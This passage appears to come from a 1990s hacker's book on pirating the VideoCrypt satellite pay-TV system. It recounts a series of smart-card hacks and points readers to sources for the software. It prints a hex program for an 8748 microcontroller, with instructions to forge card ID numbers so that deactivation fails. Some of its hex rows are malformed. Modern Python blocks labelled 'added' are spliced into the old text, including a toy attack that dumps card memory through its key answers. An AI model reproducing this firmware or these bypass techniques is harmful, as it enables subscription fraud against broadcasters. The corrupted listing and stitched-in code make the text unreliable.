that is being used beyond its safe lifetime, the point at which technology has 
advanced sufficiently to make the system vulnerable. 


The 07 card and probably the 06 card were reverse engineered. The 06 was 
not an economically viable hack as there was no cheap microcontroller that 
would have allowed the development of a pirate smart card. The first 
version of the 07 Ho Lee Fook demonstrated that mode of thinking. It was 
based on an 8752 which was intended to replace the decoder's 8052. It was 
not until a few months after the initial marketing of the hack that the first 
PIC16C54 based pirate card appeared. After that, the fate of the 07 Sky 
card was plain to everyone except Sky and News Datacom. 


The 09 card and the current 10 card have been some rather good attempts 
to shore up the system. These card issues contained some very good 
elements that, had the card remained unhacked, would have made 
VideoCrypt a very secure system indeed. Unfortunately for News Datacom 
and the users of the system, the 09 and 10 cards were reverse-engineered 
and replicated by hackers and pirates. 


The first commercial hack occurred in 1990. The Morley Research hack 
was named after the company who initially marketed the hack. Unfortu- 
nately, such actions within the boundaries of the UK are illegal. Morley 
Research were persuaded to desist from marketing the hack. 


The second hack was more or less known about among hackers though it 
was never believed feasible. It was when the bizoids got hold of it that it 
became a problem for Sky. The market was flooded with cheap little voltage 
limiters that stopped the smart card memory from being programmed. The 
name of this hack was the Infinite Lives hack. It is sometimes referred to as 
the Zener Diode hack. It stopped Sky from turning off an EPROM card by 
limiting the EPROM write voltage. 


The third hack detailed is the KENtucky Fried Chip. This one was a 
departure from the hacks that preceded it. It marked the first time that the 
actual software in the VideoCrypt decoder had been used against the 
system. 
The McCormac Hack is one to which VideoCrypt as implemented has no 
defence. This hack is based on one of the fundamental flaws of VideoCrypt 
and indeed other smart card based systems. Of course there are some 
methods of blocking this hack but most of these methods do not seem to 
work properly with the older systems. 


The fifth hack is known as the 07 Ho Lee Fook hack. The name of this hack 
is a phonetic spelling of the response of various hackers when they were 
first told of the hack. 


This was the most effective hack that occurred on the VideoCrypt system 
up to 1993. It offered proof that News Datacom's authentication routines 
were invalid or, at least, not used. The hack was a genuine Pirate smart 
card. Of course some would have seen this as a clone card but it was not. It 
did not rely on the use of a fake or clone master identity. 


The sixth hack is known as the OMIGOD hack. It is also referred to as the 
SEASON7 hack. This hack differed from all of the previous hacks in that it 
was free. The original concept behind it was that it was to restore Star Trek 
to the viewers in mainland Europe who lost it when Sky scrambled. This is a 
computer program that allows the IBM compatible to drive the decoder as a 
virtual smart card. 


The seventh hack is known as the DDT hack. Basically this is an extension 
of the OMIGOD hack. The different aspect is that it allows Delayed Data 
Transfer or Transmission. It is possible to record a scrambled program and 
then download the key stream from a BBS or an FTP site. Then by using the 
OMIGOD interface, the keystream can be used to decode the scrambled 
programme off tape. 


Another hack on the video scrambling has been achieved. It is possible to 
decode the video scrambling in real time given enough computer resources. 
This hack was carried out by Markus Kuhn, the author of the SEASON7 
hack, in Germany on a 40 RISC computer. The problem for the application 
of this hack is that not everyone has the facilities of a half a million dollar 
computer to decode the video. However it was a most elegant hack. The 
software for this hack is freely available on many internet sites and BBSes. 


With the switch from 07 to 09, most hackers and many pirates were really 
depressed. The day that Sky switched to the 09 code was named Dark 
Wednesday. Of course they did not remain depressed for long. A fragment 
of the 09 code was auctioned at the Dorchester Hotel in London. This code 
only lasted for a week but it allowed the hackers to create the most 
devastating assault on the VideoCrypt system seen so far - the Phoenix 
hack and the Genesis blockers. 
The Phoenix hack was an intellectual experiment to try and understand how 
the subscriber management system on the VideoCrypt system worked. 
Basically it was a program written to emulate a decoder. This decoder 
emulator, DECOEM.C, would send 74h packets to the card that would 
change the card's authorisation level. It was based on the Dorchester code 
and proved that once the hash function and the basic authorisation 
instructions were known, valid control messages could be sent to the card. 
Of course this was purely an intellectual exercise. However others, more 
financially minded, did not see it that way and stole the Phoenix code and 
sold it to the dealers and pirates. 


The result of this was the Genesis Blocker. The Genesis Blocker incorpo- 
rated the Phoenix activation routines with the blocking routines. Of course 
this did not prevent Sky and News Datacom from hitting the cards activated 
with the Phoenix routines even when in the blockers. This was because the 
09 card had subcommands now labeled as "nanocommands". To the, in 
retrospect, simplistic implementations of serial number search in the 
blockers, the nanocommands went right by. This was unfortunate for the 
cards as these nanocommands generally killed the activated cards. The 
biggest kill attempted by Sky in one month was over half a million cards. Of 
course by this time the next hack was ready to enter the market. 


The working version of the 09 card hack required an image of the official 
smartcard memory space. This was because News Datacom had designed 
their algorithm so that any byte in the address space could be used as an 
input to the hash function. Of course it seemed that they had ignored one 
fundamental flaw in this approach - once the algorithm and the method of 
selecting the bytes are known the card can be dumped electronically. 
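The byte-selection weakness described in the two paragraphs above, as an added toy model. It is not the 09 card's algorithm, which the page does not give, and not the Vampire hack's own code. It assumes that the ECM carries SELECT_COUNT address pointers which may repeat, uses truncated SHA-256 as a stand-in for the card's hash, and recovers a constructed 256-byte card image using nothing but the card's 78h key answers:

```python
from __future__ import annotations

import hashlib
import random

MEM_SIZE = 256       # toy card address space; the real 09 card size is not given here
SELECT_COUNT = 4     # memory bytes the ECM pulls into the hash (assumed)
KEY_LEN = 8          # the 78h packet carries an eight-byte key

# Constructed card image for the demonstration; any bytes would do.
CARD_MEMORY = bytes(random.Random(0x09).randrange(256) for _ in range(MEM_SIZE))


def card_hash(message: bytes, selected: bytes) -> bytes:
    """Stand-in for the card's hash: SHA-256 over the ECM text and the
    selected memory bytes, truncated to the key length. Only its structure
    (public function, secret inputs drawn from memory) matters here."""
    return hashlib.sha256(message + selected).digest()[:KEY_LEN]


def card_oracle(memory: bytes):
    """Behaves like a card on the bench: takes an ECM message plus the
    address pointers it carries and answers with the 78h key."""
    def respond(message: bytes, addresses: list[int]) -> bytes:
        if len(addresses) != SELECT_COUNT:
            raise ValueError("ECM must carry exactly SELECT_COUNT pointers")
        selected = bytes(memory[a] for a in addresses)
        return card_hash(message, selected)
    return respond


def dump_card(respond, size: int = MEM_SIZE) -> bytes:
    """Recover the whole address space from key answers alone.

    Every query points all SELECT_COUNT slots at one unknown address, so
    the answer depends on a single unknown byte and at most 256 candidate
    keys settle it. Knowing the hash and the pointer scheme is the whole
    precondition; no secret from the card is needed up front.
    """
    recovered = bytearray(size)
    message = b"\x74constructed-ecm"  # arbitrary fixed ECM text
    for addr in range(size):
        answer = respond(message, [addr] * SELECT_COUNT)
        for candidate in range(256):
            if card_hash(message, bytes([candidate]) * SELECT_COUNT) == answer:
                recovered[addr] = candidate
                break
        else:
            raise RuntimeError(f"no candidate matched at address {addr:#05x}")
    return bytes(recovered)


if __name__ == "__main__":
    image = dump_card(card_oracle(CARD_MEMORY))
    print("dump matches card image:", image == CARD_MEMORY)
    print(image[:16].hex())
```

If the real card refused repeated pointers, the attacker would fill the other slots with addresses already recovered; each query still leaves exactly one unknown byte and at most 256 candidates, so the address space falls in a few thousand queries either way. The defence is not a secret hash but a card that will not hash arbitrary, attacker-chosen pointer sets.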


The hack of dumping the card electronically was one of the most 
embarrassing for News Datacom. It was almost as if they read the first part 
of a two part article I wrote a few years ago on using the address space as 
the input to a hash function. In the second part of that article I outlined the 
weakness of the approach given what would happen if the hash algorithm 
and the method of byte selection became known. This hack became known 
as the Vampire Hack. 


Once the complete memory space of the Sky 09 card became publicly 
known, it was all over for Sky. This was December 1994 and the security of 
the 09 card had collapsed. Nothing they did from that point on had any 
major effect on the pirate cards for longer than a few hours. It would be ten 
months before they could activate the 10 card. That was ten months of 
abject piracy and of course Sky tried to make out all the time that it was not 
such a big thing. 
The 10 card went into operation on 31/10/1995. The day has become 
known to hackers and pirates as “Black Tuesday”. However things were not 
all that bad. The EuroCrypt channels were completely compromised and 
most people tended to watch films on the EuroCrypt channels. The reason 
for this was clear - the UK film censor had not butchered the films. With Sky, 
all of the films have been examined by the British film censors. Besides, 
these EuroCrypt channels had hardcore pornography as well. 


With the 10 card, there were many false starts and spoofs. Frequently 
blocker programs appeared on BBSes and internet sites that were 
supposed to work - they never did. Many of these blockers snatched the 
turn-on codes and just replayed them to the card when Sky turned it off. Of 
course the problem was that a replay hack only works until the month code 
changes. 


The first major hack on the Sky 10 card was on the PPV. The hack has 
become known as the Sam Chisum hack after the alias used by the 
anonymous uploader. This hack was circulated as a text string that was 
placed on BBSes and Internet sites about twenty four hours before the PPV 
event. Sending this string to the card with a Phoenix interface authorised the 
card for the PPV event. It does not look like Sky should try any more PPV 
events this year given that such a hack has occurred. 


Notes On Source Code 


The source code for many of the hacks described in the following pages is 
available from many of the BBSes such as Special Projects or Compusat or 
from the WWW and FTP sites listed in Chapter 5. Some of the hacks, the 
Nagra Secam decoder for example, are better suited to this form of 
distribution. 


A CD of the relevant software, together with the previous editions of the 
Black Book and other articles on scrambling systems will be available from 
the end of September 1996. The details of the availability and pricing of the 
CD will be posted on the following websites: 


http://www.iol.ie/~kooltek 
http://www.hackwatch.com/~kooltek 


It is expected that the cost of the CD will be in the region of £9 including 
postage worldwide. 
The Morley Research Hack 


The Morley Research Hack of 1990 had Sky nervous. Someone had found 
a way to stop Sky from turning off the cards. The basic method used was 
the interception and redirection of the write routine. This was carried out 
with a circuit that was connected between the card and the card reader. 


The code and the diagram are from the original hack. This has been 
confirmed by reliable sources. This is, apparently, another version. 


The software produces another card identification number for the decoder. 
A few years ago this particular hack was successful but apparently Sky 
bought a few and were able to stop the hack. 


The basis for the hack is that it tries to confuse the decoder into thinking that 
the card that it has inserted has a different identity number. 


This hack does not work anymore on the VideoCrypt-1 system as used in 
Europe. It is not known if it works on the implementations elsewhere. 


Program to be loaded into the 8748 microcontroller 

0000  0409000409000004    0080  83AF095310968299 
0008  09231339273A0410    0088  1034898BE08BC00FF 
0010  1458D3AC96108A02    0090  F7AFE6951C27F7F7 
0018  F8D36F96101458D3    0098  4310393492EE8FFC 
0020  81C648FFD383C64A    00A0  53010301F7431039 
0028  FFD385C64CFFD387    00A8  3492231339349234 
0030  C64EFFD389C650FF    00B0  9283AF09531096B3 
0038  D38BC652FFD38DC6    00B8  2315393489BE08BC 
0040  54FFD38FC6560410    00C0  00FFF7AFE6C71C27 
0048  04E804F1241B2438    00C8  F7F7F7F743153934 
0050  243C244524492468    00D0  92EEC1FC53010301 
0058  094767F658BE06EE    00D8  F7F7F74315393492 
0060  5EBE081478094767    00E0  2313393492349283 
0068  FFF7AFEE63147814    00E8  8A02231239890104 
0070  78F9A8FAA9FFAA83    00F0  108A04BB0A1458D3 
0078  BD0DED7A8A019A00    00F8  8396F523FE148123 
0100  EB14812304148123    0170  8F966D23B0148123 
0108  071481230B148123    0178  1514812306148123 
0110  FB148123FF1481EB    0180  1614812359148104 
0118  1304108A08BB1814    0188  109A00BD07ED8D8A 
0120  58D3E6961F238514    0190  80839A00BD09ED96 
0128  81237F1481000000    0198  8A8000839A01**** 
0130  23FF1481EB300410 
0138  8A1004108A202312 
0140  398A0104108A4004 
0148  108A80BB0A1458D3 
0150  EC696102305148223 
0158  4F14B223E014B223 
0160  FB14B223FF14B2EB 
0168  6304108A801458D3 

Instructions: 

Change bytes &174, &178, &17C, &180 and &184 to random values from &00 
to &FF to create a new card ID number. This will reduce the chance of the 
decoder receiving a deactivation code which matches that of the card the 
decoder thinks it has installed. 


Comments: 


The Morley Research hack was intended to be constructed without a card 
reader. In 1990, the card readers were not as easily obtained as they are 
now. The 1990 solution was to construct a makeshift card reader using an 
arrangement of connectors and a clamp that would hold the card in the 
correct position. The unit would be fitted between the card and the decoder. 
In this respect it was exactly like the Genesis blockers used with the 09 Sky 
cards. Unlike the sleek production line models available for the 09 Sky card, 
this was very much a prototype. The device could be hardwired to the 
decoder's PCB; alternatively a filed down G10 PCB of the same thickness as 
a smart card could have been used. 


The circuitry in the diagram has some strange configurations. The LED 
connected to the multiplexer will dump current into the multiplexer when 
turned on. 


This hack is more remarkable for what it represents than what it actually did. 
It was the first time that the card to decoder data was attacked in a manner 
that was potentially economically viable. Fortunately for Sky and News 
Datacom, they were able to overcome this hack. Otherwise the blocker 
problem would have appeared on the market some four years earlier than it 
did. 
The Infinite Lives Hack 


The VideoCrypt decoder was supposed to be a dumb terminal devoid of any 
great secrets. Perhaps it was but there was a very serious flaw in the cards 
prior to issue 06 - they were EPROM types. This meant that they required a 
voltage greater than 17 Volts to overwrite the card. 


Rumours started floating around among the hackers that it was possible to 
modify the decoders so that the cards could not be invalidated. It was 
therefore possible for a Sky smart card to last indefinitely or at least until the 
next ROM change. 


This hack was referred to as the “Infinite Lives Hack”. Messages appeared 
on computer bulletin boards detailing the operation. An operation which 
involved snipping a few wires, soldering a few others and installing a zener 
diode. 


Basically, the hack involved limiting the voltage on the card’s programming 
connector. The voltage on this connector had to be in the region of 21 Volts 
for the card to be reprogrammed or written to. Cutting the voltage to this 
connector would have meant that the card and therefore the decoder would 
not work. Instead, the voltage was limited to a value, typically 15 Volts which 
would allow the card to operate but would not allow the card write operation 
to be successful. 


A plethora of devices appeared on the market. The cost of these units 
ranged from about thirty pounds to over one hundred pounds. One pirate 
was offering a sample quantity of one hundred units for about four thousand 
dollars. Plainly these devices were little more than voltage limiters but they 
exploited a serious flaw in the VideoCrypt system. The publicity information 
on some of these products also claimed that they worked on D2-MAC 
Eurocrypt. 


The Infinite Lives hack prevented the card's EPROM memory from being 
written to and therefore Sky could not turn off the cards. On the surface this 
would not seem too serious a problem. Of course when examined in detail, 
it was a problem of devastating proportions. 


The actual problem lay with the Quickstart cards. A wonderful marketing 
invention by someone with a monumental ignorance of pay television 
security. These cards would be turned on by Sky over the air. They would 
allow a customer to walk into a shop, sign up and be authorised within a few 
hours. 


There were so many dead people signed up for Sky that every day was a 
mini Last Judgment. False names and addresses were used with a 
professionalism that would impress the best spies. Even some of the 
dealers got in on the act. 


Of course most, if not all, of the Quickstart smart cards were destined for 
use in mainland Europe. The procedure up to the Infinite Lives hack was 
that the card would be authorised and then taken and kept out of a decoder 
for a month or two. Sky would send out the card identity in the blacklist at 
various times and since the card was not in a decoder it could not be 
switched off. The blacklist is transmitted on all Sky channels for maximum 
effectiveness. 


The Infinite Lives hack caused a mushroom effect in the trade of the 
Quickstart cards in Europe. It was now possible to get a card that could not 
be switched off and was valid almost indefinitely. Normally if a Quickstart 
card in Europe gets nuked, the supplier has to provide another. The Infinite 
Lives hack meant that the risk of the cards being switched off was 
minimised. The cards held back in reserve by the suppliers were immedi- 
ately brought on to the market. 


The situation was getting out of hand and Sky were forced to act. They 
brought out a new card issue. From issue 06 onwards, cards were 
EEPROM. They incorporated a voltage tripler on the card wafer so that the 
Vpp voltage was not necessary. This solved the problem of the Infinite 
Lives hack. Unfortunately the fools who came up with the Quickstart 
program were apparently still with Sky. 


Sky's recovery from the Infinite Lives hack was a perfect demonstration of 
the main strength of smart cards. It allows the recovery of a compromised 
system. Smart cards are not impossible to reverse engineer, it is just 
expensive and hard to do so. The periodic change of cards is more of a 
deterrent to hacking than a card change when the system is compromised. 


The amazing thing is that Sky and News Datacom had a very good 
opportunity to assess the scale of the Infinite Lives Hack and they never 
took it. 


At the Subscription Television 1992 conference a delegate from News 
Datacom said that the fault for this hack lay with the card manufacturers 
rather than News Datacom. This was a rather strange statement considering 
that it would only require a few bytes of code to check whether the card 
had been written to. The same type of check could have been used to detect 
whether a KENtucky Fried Chip was in operation. 


The crypto processor would have been instructed over the air to read a 
certain address in the card's memory and store the result as (A). Then it 
would have been instructed to write the new data, (B), to the address. The 
next step would be to read the new data from that address and store the 
result as (C). 


The check is simply a series of comparisons. 
1. (A) should not equal (C) 
2. (B) should equal (C) 
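The read/write/read check above, written out as an added example against a simulated EPROM card. This is not News Datacom's code. It assumes the 21 V programming threshold and the 15 V clamp quoted earlier in this section, and models the property of EPROM that programming can only clear bits, never set them:

```python
from __future__ import annotations

EPROM_VPP_NEEDED = 21.0   # volts needed for a write to take (from the text)
CLAMPED_VPP = 15.0        # what the zener limiter leaves on the Vpp pin


class EpromCard:
    """Toy EPROM card: bits can only be programmed from 1 to 0, and only
    when the programming voltage reaches EPROM_VPP_NEEDED."""

    def __init__(self, image: bytes, vpp: float):
        self.mem = bytearray(image)
        self.vpp = vpp

    def read(self, addr: int) -> int:
        return self.mem[addr]

    def write(self, addr: int, value: int) -> None:
        if self.vpp >= EPROM_VPP_NEEDED:
            self.mem[addr] &= value   # programming clears bits, never sets them
        # otherwise the write silently does nothing: the Infinite Lives case


def pick_test_write(a: int) -> int | None:
    """Choose B so that a successful write is observable: clear the lowest
    set bit of A. If A is already 0x00 nothing at that address can change,
    so the address is useless for the test."""
    if a == 0:
        return None
    return a & (a - 1)


def write_check(card: EpromCard, addr: int) -> bool | None:
    """The over-the-air check the text describes: read (A), write (B), read (C).

    Returns True if the card can be written, False if writes are being
    blocked, None if the chosen address cannot be tested."""
    a = card.read(addr)
    b = pick_test_write(a)
    if b is None:
        return None
    card.write(addr, b)
    c = card.read(addr)
    return a != c and b == c


if __name__ == "__main__":
    image = bytes([0xFF, 0x80, 0x00, 0x5A])   # constructed scratch area
    print("normal decoder :", write_check(EpromCard(image, 21.0), 0))
    print("zener limiter  :", write_check(EpromCard(image, CLAMPED_VPP), 0))
    print("exhausted cell :", write_check(EpromCard(image, 21.0), 2))
```

The comparison only tells the operator something when B differs from A in a direction the memory can actually take, which is why pick_test_write clears a set bit rather than writing an arbitrary value. Every test permanently consumes a bit, so a real implementation would run it against a scratch area of the card. A clamped Vpp shows up as A == C, and the same test exposes a KFC-style blocker, because a write that is blocked never reaches the card either.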


The KENtucky Fried Chip 


At the time, the significance of the KENtucky Fried Chip was not realised. It 
was the starting point of the Phoenix hacks and the Genesis blockers. It 
was a replacement microcontroller for the decoder's 8052. The program in 
the KFC would read the card's serial number and look for packets with that 
card's serial number in them. It would then block the packet from ever 
reaching the card therefore ensuring that Sky could not turn off that card. 
This also meant that the card could not be authorised for other channels 
while the KENtucky Chip was in operation. 


The name of the chip is a hacker's joke. It is named after Sky's head of 
security, Mr. Ken Crouch. Apparently he was being too successful in 
stamping out some Grey Market card operations. As a mark of respect to a 
worthy adversary, the hackers decided to name this hack the KENtucky 
Fried Chip. 


VideoCipher II and EuroCypher used the philosophy of the Embedded 
Secure Microcontroller. VideoCrypt relied on the Detachable Secure 
Microcontroller philosophy and reduced the decoder to the status of a dumb 
terminal. There are some good arguments on each side. 


The Embedded Secure Microcontroller approach was discredited years 
ago. VideoCipher II and FilmNet's Digital Audio were hacked, proving that 
the Embedded Secure Microcontroller is anything but. EuroCypher was 
BSB's system. The number of hackers trying to hack a system is a very 
good gauge of the success of a channel. BSB was considered by the 
Blackbox Industry to be a waste of time. It was subsequently taken over by 
Sky. Of course the Detachable Secure Microcontroller approach was also 
shown to be based on less than sound principles when the Sky and 
EuroCrypt cards were hacked. 


The fatal flaw in the VideoCrypt decoder that facilitated the KFC was the 
unprotected 8052. This microcontroller handles the decoder housekeeping. 
It also handles the secure microcontroller - card interface. It is standard 
procedure to blow the read fuses in decoder microcontrollers. This prevents 
unauthorised viewing of the stored program. Strangely, the read fuses on 
the official 8052 were not blown. In the Blackbox Industry this was looked 
upon as a screw-up of the highest magnitude. There may have been a valid 
explanation though. 


Apart from the power supply section, the commonest failed component in 
the faulty VideoCrypt decoders is the 8052. In light of recent hacks, this 
problem would have increased. It would therefore make sense if it was 
possible to replace the chip without having to purchase an official model. 


Many service centres will, in the case of a failed 8052 either replace it with 
an 8052 from a junked decoder or with an 8752 programmed with the 
program from an official 8052. Perhaps Thomson and News Datacom had 
this in mind when choosing not to blow the read fuses. Of course this might 
all be attributing foresight where bumbling happened. 


Sky and News Datacom successfully countered version 1.0 of the KFC. 
Version 1.1 was actually ready for launch when Sky issued the 07 smart 
cards. The software in the new batch was different from the previous batch. 
As a result, the version 1.0 and 1.1 KFCs did not work. 


News Datacom do not seem to have learned very much from the 
VideoCipher II fiasco. One of the first KFC hacks used a piggy back 
arrangement for the EPROM. The hacker EPROM and the official EPROM 
were mounted on a PCB with a multiplexer and a DIL socket. Whenever 
necessary the official EPROM could be switched back into circuit. 


The whole principle of the KENtucky Fried Chip was reused for the Sky 09 
blockers. However hacks such as these are only second phase hacks. 
When reliable pirate cards become available, hacks such as the blockers 
and the KFC fade into insignificance. However the theory is always waiting 
to be employed on each new card issue. 
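The serial-number filtering described for the KFC above, and the reason the Genesis blockers let the 09 nanocommands through (see the Phoenix and Genesis discussion earlier in the chapter), as an added toy model. It is not the KFC or Genesis code, and it is not the real 74h packet layout, which the page does not give: the control-packet format, the subcommand numbers and the serial number are all constructed for the illustration.

```python
from __future__ import annotations

# Constructed serial number and packet layout for the demonstration.
CARD_SERIAL = bytes.fromhex("0012D687")

# Hypothetical decoder->card control packet: instruction byte, subcommand
# byte, then a subcommand-specific body.
INSTR_CONTROL = 0x74
SUB_KILL_SERIAL = 0x01   # body: 4-byte serial; deactivate exactly that card
SUB_KILL_RANGE = 0x02    # body: 4-byte low serial, 4-byte high serial
SUB_AUTHORISE = 0x03     # body: 4-byte serial; turn that card on


def build_packet(sub: int, body: bytes) -> bytes:
    return bytes([INSTR_CONTROL, sub]) + body


def naive_blocker(packet: bytes, serial: bytes) -> bool:
    """KFC / first-generation Genesis logic: forward the packet unless the
    card's own serial number appears in it byte-for-byte."""
    return serial not in packet


def semantic_blocker(packet: bytes, serial: bytes) -> bool:
    """A blocker that understands each addressing mode instead of searching
    for the literal serial. This is the knowledge the blocker authors lacked
    for the nanocommands."""
    if packet[0] != INSTR_CONTROL:
        return True
    sub, body = packet[1], packet[2:]
    me = int.from_bytes(serial, "big")
    if sub == SUB_KILL_SERIAL:
        return body[:4] != serial
    if sub == SUB_KILL_RANGE:
        lo, hi = int.from_bytes(body[:4], "big"), int.from_bytes(body[4:8], "big")
        return not (lo <= me <= hi)
    return True


class Card:
    """Toy card that honours the three subcommands above."""

    def __init__(self, serial: bytes):
        self.serial = serial
        self.active = True

    def handle(self, packet: bytes) -> None:
        if packet[0] != INSTR_CONTROL:
            return
        sub, body = packet[1], packet[2:]
        me = int.from_bytes(self.serial, "big")
        if sub == SUB_KILL_SERIAL and body[:4] == self.serial:
            self.active = False
        elif sub == SUB_KILL_RANGE:
            lo, hi = int.from_bytes(body[:4], "big"), int.from_bytes(body[4:8], "big")
            if lo <= me <= hi:
                self.active = False
        elif sub == SUB_AUTHORISE and body[:4] == self.serial:
            self.active = True


def run_through_blocker(card: Card, packets: list[bytes], blocker) -> list[bool]:
    """Feed packets through the blocker; returns which ones reached the card."""
    forwarded = []
    for p in packets:
        ok = blocker(p, card.serial)
        forwarded.append(ok)
        if ok:
            card.handle(p)
    return forwarded


def demo(blocker) -> tuple[bool, list[bool]]:
    """Literal kill, legitimate authorisation, then a range kill that covers
    the card without ever spelling out its serial."""
    card = Card(CARD_SERIAL)
    me = int.from_bytes(CARD_SERIAL, "big")
    packets = [
        build_packet(SUB_KILL_SERIAL, CARD_SERIAL),
        build_packet(SUB_AUTHORISE, CARD_SERIAL),
        build_packet(SUB_KILL_RANGE, (me - 16).to_bytes(4, "big") + (me + 16).to_bytes(4, "big")),
    ]
    forwarded = run_through_blocker(card, packets, blocker)
    return card.active, forwarded


if __name__ == "__main__":
    print("naive blocker   :", demo(naive_blocker))
    print("semantic blocker:", demo(semantic_blocker))
```

naive_blocker reproduces both effects the text describes: it stops the literal deactivation but also stops the legitimate authorisation for the same serial, and it forwards the range kill because the card's serial never appears in that packet byte-for-byte, so the card dies anyway. semantic_blocker shows what a blocker has to know to hold: the card's own interpretation of every addressing mode, which is exactly what was missing when the nanocommands arrived.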


The McCormac Hack 


The first hack on the VideoCrypt system took just fifteen seconds. Five 
seconds to work it out and ten to write it down. In terms of simplicity it was 
devastating. In terms of security it should never have happened. It had 
applications far beyond VideoCrypt. 


It was just like bugging a telephone conversation. You take the data flowing 
between the smart card and the decoder and transmit it around an area. 
Each of the other decoders has a small radio receiver inserted in the smart 
card socket. The card is virtually inserted in each decoder and each 
decoder then proceeds to decode the channel. The theory was tested by 
connecting two decoders with three wires; a ground wire, the data wire and 
a reset wire. It worked. 
It blew the credibility of VideoCrypt to pieces but the hacks that followed 
were even more devastating as they had more commercial applications. 
With those hacks, pirate smart cards became available and the McCormac 
Hack as it stood then was not exactly relevant. 


With the lack of a pirate 10 card, the theory has been dusted off and 
examined in the light of a relatively new development - the Internet. It could 
be that the main problem of seed distribution has been solved. It may just 
be possible to have one official smart card hooked up decoding a channel 
and with the dataflow being monitored and broadcast over the internet. 


The primary difference from the 1989 version of the hack is that the 
internet is used to route the seed keys. The original theory had a radio 
connection for distribution. There is apparently a radio based version of the 
hack in operation in Spain on an MMDS network. 


In the 1996 version, the theory is that the dataflow between a legitimate 
smart card and a decoder will be monitored via a Season type interface. 
The PC would then rebroadcast the keys via the internet to a number of 
satellite PCs. The satellite PCs would have their own Season type interface 
which would be hooked into a decoder or IRD running on the same channel 
as the master. 


Of course the disadvantage is that only one channel can be handled at any 
given time. It would be possible for the same kind of setup to be duplicated 
for each channel. As a result all of the premium channels could be hacked. 


In order to run such an operation, a multitasking operating system would be 
required by the PC. This rules out DOS and Windows. The ideal candidate 
for this type of operation is Linux. 


The most critical aspect of such a hack would be the routing time between 
the server PC and the satellite PCs. If this is too great then the seed will not 
arrive in time. The time taken for routing can easily be established with a 
TRACEROUTE command. 


The present state of the internet precludes such a hack running on a 
transnational basis. The internet is just not fast enough. Even in Ireland, the 
routing between some of the internet service providers is not exactly brilliant. 
It took hops across the UK and the United States to get from one ISP to 
another. Geographically, these ISPs were only a few miles apart. 


A more viable possibility, especially where there is a low cost local phone 
rate (i.e. not Ireland), would be a pseudo-BBS approach to the problem. A 
BBS can handle a number of simultaneous connections at once. Therefore, 
by using a SEASON setup feeding the BBS, each dial-up port would be able 
to feed another computer running a SEASON interface on one serial port 
and a modem on the other. The application could be written under DOS 
though the server would be better under Linux or Unix. 


The main traffic on the link would be the seeds and the ZKT tests. However 
it might be possible for News Datacom to make the 74h packets 
interdependent and perhaps to tighten up the timing. This is similar to some 
of the modifications made with the VideoCrypt-II system. However the bulk 
of the programming is transmitted via VideoCrypt-I. This system is flawed as 
the decoder does not have a box ID number although it was part of the 
initial specification. 


The main question about these formats of hack is the cost. Would it be 
reasonable to have a leased line connection just to watch the Sky premium 
channels? The answer is a resounding no. There are cheaper methods. 
However if it is only going to be used for premium programmes such as the 
Simpsons and Star Trek Voyager then it becomes feasible. Of course the 
main and most devastating application for this hack is Pay Per View events. 


In Europe, Sky has not risked screening any real PPV events. The first 
potential PPV event that Sky was to screen in 1996 was the Bruno vs Tyson 
boxing match. That was hacked and it was possible to upgrade cards with a 
Phoenix program. The venture was not exactly a resounding success as it 
was aired around 0500 hrs. As a result it was not exactly primetime viewing 
in Europe. It was also available on the totally hacked TV1000 channel. 


Of course with the planned introduction of PPV in the next twelve months, 
the possibility of a McCormac Hack is a very real threat to VideoCrypt. 


The situation is different with DirecTv DSS in that there are PPV channels 
already in operation. The DirecTv system has a working box serial number 
system but this seems easy enough to bypass. 
The 07 Ho Lee Fook Hack 


There is no such thing as coincidence, or is there? On the day in 1993 that 
the film "Sneakers" was released on video I received an actual working hack 
for the scrambled Sky channels. The film "Sneakers" is about events 
surrounding a piece of equipment that can hack any cryptosystem. The 
piece of equipment that I received was essentially a chip that hacked the 
BSkyB VideoCrypt channels. 


The hack on the VideoCrypt system was labeled the “Ho Lee Fook” hack. 
The reason for this name is more to do with people’s reaction to the hack 
rather than its origin. Very few people are sure as to where exactly the hack 
originated and those who are sure are not speaking. 


The VideoCrypt system is the mainstay of the BSkyB satellite television 
empire. It is the means by which BSkyB makes its money from the 
subscribers. The basic theory is that they pay a subscription and they 
receive a smart card. This smart card, when inserted into the VideoCrypt 
decoder will allow the decoder to descramble the channels paid for. It is also 
possible for BSkyB to turn off the cards of those subscribers who have not 
paid. 


Other channels using the VideoCrypt system were hit. The Adult Channel, 
JSTV and TV Asia were compromised as well. This meant that all of the 
channels using the VideoCrypt system as a fee gathering system lost 
control of the market in one fell swoop. 


This was to that point perhaps the most dangerous hack to have occurred 
on VideoCrypt. In effect it was a new smart card that gave access to all the 
Sky channels. Of course the problem for Sky was that it was not a genuine 
Sky card. 


The pirate smart card was approximately sixteen millimetres longer than the 
official Sky card. It is a blue printed circuit with a single surface mount chip. 
There were five connector pads. 


The standard check for a card of this nature is to look for a wafer from an 
official smart card. In the early days, a fairly common scam was to take the 
chip and connector pad from a valid Sky card, trim away the plastic and then 
put the chip in a DIL header. The DIL header would then be blobbed in a 
lump of black resin so that it looked like an IC. 


The chip on the PCB was the real thing. There was no wafer underneath the 
body of the chip. The actual stubs of the chip die were just visible at the end 
of the chip. The chip was a PIC16C54. This was the EPROM version of the 
now commonplace PIC16C84. 
Actually there were two different versions of the 07 Ho Lee Fook hack. The 
card version was the later one. The first version was a replacement for the 
8052 in the decoder. The official VideoCrypt name for the 8052 chip in the 
decoder is "The Verifier". This chip had to be removed and replaced with the 
Ho Lee Fook 8752 chip. The decoder then decoded the scrambled 
channels without the need for the BSkyB smart card. This was exactly 
the thing that people had said could never happen - a cardless Sky decoder. 


If it had been a direct clone, Sky would have been able to kill it over the air 
or would they? They were not able to kill the Ho Lee Fook cards by 
neutralising a specific card identity - the pirate smart cards had no card 
identity numbers. When they were reset, they returned a string of zeroes as 
their identity number. 


There were of course more devastating implications here. The card only 
contained the data and algorithms necessary to descramble the signals. 


A card that only contained enough information to descramble the signal 
would reduce VideoCrypt to the status of a system like SAVE. More than a 
few hackers were laughing as a result. The arrogance of News Datacom 
only inspired hackers. Here were these people with their new system 
making out that they were better than all who had come before them and 
indeed all that stood before them. Obviously they, having inhabited the 
sterile environment of a laboratory for too long, did not realise that the 
mindpower employed to hack the system was far greater than that 
employed to design the system. 


The much vaunted Fiat Shamir Zero Knowledge Test was nowhere to be 
seen. If the ZKT had indeed been implemented properly then all of these 
pirate cards would have been knocked out. 


According to the early theory on VideoCrypt, the smart card had to 
authenticate itself to the decoder and prove it was a genuine smart card. 
This was apparently just a load of waffle. If it was not then the Ho Lee Fook 
